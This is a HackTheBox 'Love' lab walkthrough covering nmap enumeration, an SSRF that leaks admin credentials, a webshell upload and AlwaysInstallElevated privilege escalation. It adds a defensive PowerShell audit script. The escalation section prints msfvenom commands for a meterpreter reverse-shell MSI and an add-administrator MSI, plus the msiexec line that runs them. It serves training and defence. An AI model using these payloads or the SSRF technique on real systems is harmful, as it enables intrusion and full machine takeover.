Love

Posted on Aug 7, 2021

HTB - Love

Enumeration

NMAP

└─$ sudo nmap -sC -sV 10.10.10.239
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-10 06:28 EDT
Nmap scan report for 10.10.10.239
Host is up (0.076s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings: 
|   LDAPSearchReq, SMBProgNeg, X11Probe, afp: 
|_    Host '10.10.16.65' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h41m28s, deviation: 4h02m30s, median: 21m27s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-10T03:50:08-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-10T10:50:07
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.52 seconds

HTTP

Certificate gives hints about the domain and a user.

![[Pasted image 20210510123206.png]]

http://love.htb/

Shows “Voting System using PHP”.

Exploring http://staging.love.htb/ there is a page beta.php which lets the user enter a URL; the server fetches the file at that URL and "scans" it.

We try this out

![[Pasted image 20210511150356.png]]

![[Pasted image 20210511150410.png]]

We are not able to reach https://10.10.10.239:5000/ directly; as the nmap output shows, it answers with 403 Forbidden.

![[Pasted image 20210511150615.png]]

If we enter this URL in the file scanner instead, the request is made by the server itself (an SSRF), and the response contains credentials to the Voting System.

![[Pasted image 20210511150652.png]]

Vote Admin Creds: admin:@LoveIsInTheAir!!!!

User and foothold

With the admin credentials we can log into the Voting System and look for a way to exploit it.

This recent exploit seems to be applicable in this case.

Uploading the webshell and triggering it will give us user.

![[Pasted image 20210512120233.png]]

Root

Privilege Escalation

Running winPEAS we observe that AlwaysInstallElevated is on, which we can confirm:

![[Pasted image 20210512131952.png]]

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
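The reg query above only looks at the HKCU value, but Windows Installer honours AlwaysInstallElevated only when it is set to 1 in both the HKLM and the HKCU policy keys. The following PowerShell audit script is an added example (not part of the original write-up) that checks both hives and reports whether the policy is effectively enabled; the function name and the remediation lines are my own.

```powershell
# Audit script (added example): report whether AlwaysInstallElevated is
# effectively enabled. The policy only takes effect when the value is 1 in
# BOTH the machine (HKLM) and the user (HKCU) policy keys.
$paths = @{
    'HKLM' = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    'HKCU' = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

function Get-AlwaysInstallElevatedState {
    $result = [ordered]@{}
    foreach ($hive in $paths.Keys) {
        $value = 0
        try {
            $value = (Get-ItemProperty -Path $paths[$hive] -Name AlwaysInstallElevated -ErrorAction Stop).AlwaysInstallElevated
        } catch {
            # A missing key or value means the policy is not set in this hive.
            $value = 0
        }
        $result[$hive] = [int]$value
    }
    # Effective only when both hives are set to 1.
    $result['Effective'] = ($result['HKLM'] -eq 1) -and ($result['HKCU'] -eq 1)
    return $result
}

$state = Get-AlwaysInstallElevatedState
"HKLM AlwaysInstallElevated = $($state.HKLM)"
"HKCU AlwaysInstallElevated = $($state.HKCU)"
if ($state.Effective) {
    Write-Warning 'AlwaysInstallElevated is effectively ENABLED: any user can install MSI packages as SYSTEM.'
    # Remediation (needs an elevated prompt); uncomment to apply:
    # Set-ItemProperty -Path $paths['HKLM'] -Name AlwaysInstallElevated -Value 0
    # Set-ItemProperty -Path $paths['HKCU'] -Name AlwaysInstallElevated -Value 0
} else {
    'AlwaysInstallElevated is not effectively enabled (requires 1 in both hives).'
}
```

Installs performed under this policy are recorded in the Application event log by the MsiInstaller source (event ID 1033 names the product and the installing user), which is where to look when hunting for abuse of it.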

We follow the usual steps (reference command: msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi # No UAC format):

  1. Create the payload msfvenom -p windows/x64/meterpreter/reverse_tcp -f msi lhost=10.10.16.65 lport=9005 -o bad.msi
  2. Execute the payload on victim msiexec /quiet /qn /i C:\Users\Phoebe\Desktop\bad.msi
  3. Profit ![[Pasted image 20210512133954.png]]